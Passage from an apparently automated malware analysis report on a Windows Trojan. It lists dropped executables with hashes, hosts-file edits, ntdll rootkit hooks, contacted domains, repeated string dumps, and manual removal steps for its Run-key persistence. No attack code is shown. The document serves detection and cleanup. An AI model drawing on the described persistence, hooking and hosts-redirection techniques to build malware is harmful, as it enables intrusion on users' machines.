6d936ba5cb5ea8d5832144735a63b539 | c:\Users\"%CurrentUserName%"\tiaikar.exe |
5228e16169afe9388afe27a6e3c795b9 | c:\Users\"%CurrentUserName%"\tiaot.exe |
11e2fbac741397aa1f144879b69feeff | c:\Users\"%CurrentUserName%"\yoosex.exe |
4477f345e43b80c8cff14f24089fddfd | c:\Users\"%CurrentUserName%"\zebex.exe |
5c7536ce607ab7e2779997b19d70ef19 | c:\Users\"%CurrentUserName%"\zmloof.exe |
cafa7eb8bd07909be2fc354744b6d62e | c:\e046c539bd9731dbdf5471f28abfefe3.usr |
HOSTS file anomalies
The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 864 bytes in size. The following entries are added to the hosts file:
127.0.0.1 | jL.chura.pl |
127.0.0.1 | validation.sls.microsoft.com |
Rootkit activity
The Trojan installs the following user-mode hooks in ntdll.dll:
NtQueryInformationProcess
ZwOpenFile
NtDeviceIoControlFile
ZwCreateUserProcess
ZwCreateProcessEx
NtCreateProcess
ZwCreateFile
Propagation
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
 | 4096 | 16384 | 6656 | 5.29846 | 4cee79ac2671e36829d0bb610df5b052 |
.rsrc | 20480 | 102400 | 102400 | 3.05157 | 7b8b82c4183cc46e59615e0e6fcd8f14 |
petite | 122880 | 379 | 512 | 2.83683 | d9152af36e3787ad41768ba5d11906da |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
URL | IP |
---|---|
ns1.spansearcher.net | |
ns1.player1352.net | |
ns1.player1352.org | |
ns1.spinsearcher.org | |
time.windows.com | |
sys.zief.pl | |
core.ircgalaxy.pl | |
dns.msftncsi.com | |
teredo.ipv6.microsoft.com | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
The Trojan connects to the servers at the following location(s):
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
advapi32.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
winhttp.dll
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<LOC> %S(%d) </LOC>
tagname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
Microsoft Windows Search Protocol Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchProtocolHost.exe
Windows
7.00.7601.17610
SearchFilterHost.exe_3656:
.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
IMM32.dll
MSSHooks.dll
mscoree.dll
SHLWAPI.dll
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
SearchFilterHost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Search.MSSFH"
<requestedExecutionLevel
3 3(30383|3
kernel32.dll
Software\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
tquery.dll
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<ERR> 0xx=
<LOC> %S(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%S"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%S"
</MSG></TRC>
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
winhttp.dll
Microsoft Windows Search Filter Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchFilterHost.exe
Windows
7.00.7601.17610
peaab.exe_3032:
.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net
jxqol.usr_2056:
.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net
zebex.exe_2016:
.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net
tiaikar.exe_2644:
.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net
gomoz.exe_364:
.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net
tiaot.exe_1980:
.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net
ngqey.exe_2220:
.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net
yoosex.exe_2204:
.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net
zmloof.exe_3272:
.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net
kpwod.exe_3804:
.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net
laudew.exe_1532:
.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net
gmras.exe_2132:
.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net
pyyog.exe_772:
.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net
balab.exe_3320:
.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net
naezuid.exe_3280:
.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net
haeusa.exe_3948:
.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net
caqap.exe_2416:
.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net
gaejoa.exe_1564:
.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net
tiisoh.exe_3180:
.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net
qnsaog.exe_1748:
.text
`.data
.rsrc
MSVBVM60.DLL
uGeXEN
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net
boohu.exe_1796:
.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net
soeejac.exe_1668:
.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
ntvdm.exe:3432
jxqol.exe:4052
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Users\"%CurrentUserName%"\naezuid.exe (922290 bytes)
C:\Users\"%CurrentUserName%"\tiaot.exe (922290 bytes)
C:\Users\"%CurrentUserName%"\caqap.exe (922290 bytes)
C:\Users\"%CurrentUserName%"\qnsaog.exe (922290 bytes)
C:\Users\"%CurrentUserName%"\peaab.exe (922290 bytes)
C:\Users\"%CurrentUserName%"\balab.exe (922290 bytes)
C:\Users\"%CurrentUserName%"\kpwod.exe (922290 bytes)
C:\Users\"%CurrentUserName%"\haeusa.exe (922290 bytes)
C:\Users\"%CurrentUserName%"\gomoz.exe (922437 bytes)
C:\Users\"%CurrentUserName%"\gaejoa.exe (922290 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scsAC9.tmp (335 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scsADA.tmp (269 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\Setup.exe (444160 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Setup.exe (408872 bytes)
C:\e046c539bd9731dbdf5471f28abfefe3.usr (145155 bytes)
C:\Windows\USR_Shohdi_Photo_USR.exe (6889123 bytes)
C:\Windows\System32\USR_Shohdi_Photo_USR.rsu (45796 bytes)
C:\Users\"%CurrentUserName%"\jxqol.exe (252752 bytes)
C:\Users\"%CurrentUserName%"\jxqol.usr (145155 bytes)
C:\Users\"%CurrentUserName%"\zebex.exe (922437 bytes)
C:\Users\"%CurrentUserName%"\tiaikar.exe (922437 bytes)
C:\Users\"%CurrentUserName%"\laudew.exe (922290 bytes)
C:\Users\"%CurrentUserName%"\ngqey.exe (922290 bytes)
C:\Users\"%CurrentUserName%"\tiisoh.exe (922290 bytes)
C:\Users\"%CurrentUserName%"\pyyog.exe (922290 bytes)
C:\Users\"%CurrentUserName%"\yoosex.exe (922290 bytes)
C:\Users\"%CurrentUserName%"\gmras.exe (922290 bytes)
C:\Users\"%CurrentUserName%"\zmloof.exe (922290 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"naezuid" = "C:\Users\"%CurrentUserName%"\naezuid.exe /X"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"tiaot" = "C:\Users\"%CurrentUserName%"\tiaot.exe /P"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"caqap" = "C:\Users\"%CurrentUserName%"\caqap.exe /Y"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"qnsaog" = "C:\Users\"%CurrentUserName%"\qnsaog.exe /V"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"peaab" = "C:\Users\"%CurrentUserName%"\peaab.exe /A"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"balab" = "C:\Users\"%CurrentUserName%"\balab.exe /D"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"kpwod" = "C:\Users\"%CurrentUserName%"\kpwod.exe /k"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"haeusa" = "C:\Users\"%CurrentUserName%"\haeusa.exe /m"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"gomoz" = "C:\Users\"%CurrentUserName%"\gomoz.exe /r"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"gaejoa" = "C:\Users\"%CurrentUserName%"\gaejoa.exe /T"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"zebex" = "C:\Users\"%CurrentUserName%"\zebex.exe /G"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"jxqol" = "C:\Users\"%CurrentUserName%"\jxqol.exe /v"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"tiaikar" = "C:\Users\"%CurrentUserName%"\tiaikar.exe /I"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"laudew" = "C:\Users\"%CurrentUserName%"\laudew.exe /h"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"ngqey" = "C:\Users\"%CurrentUserName%"\ngqey.exe /P"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"tiisoh" = "C:\Users\"%CurrentUserName%"\tiisoh.exe /y"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"pyyog" = "C:\Users\"%CurrentUserName%"\pyyog.exe /z"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"yoosex" = "C:\Users\"%CurrentUserName%"\yoosex.exe /E"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"gmras" = "C:\Users\"%CurrentUserName%"\gmras.exe /k"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"zmloof" = "C:\Users\"%CurrentUserName%"\zmloof.exe /u"
- Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
127.0.0.1 localhost
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.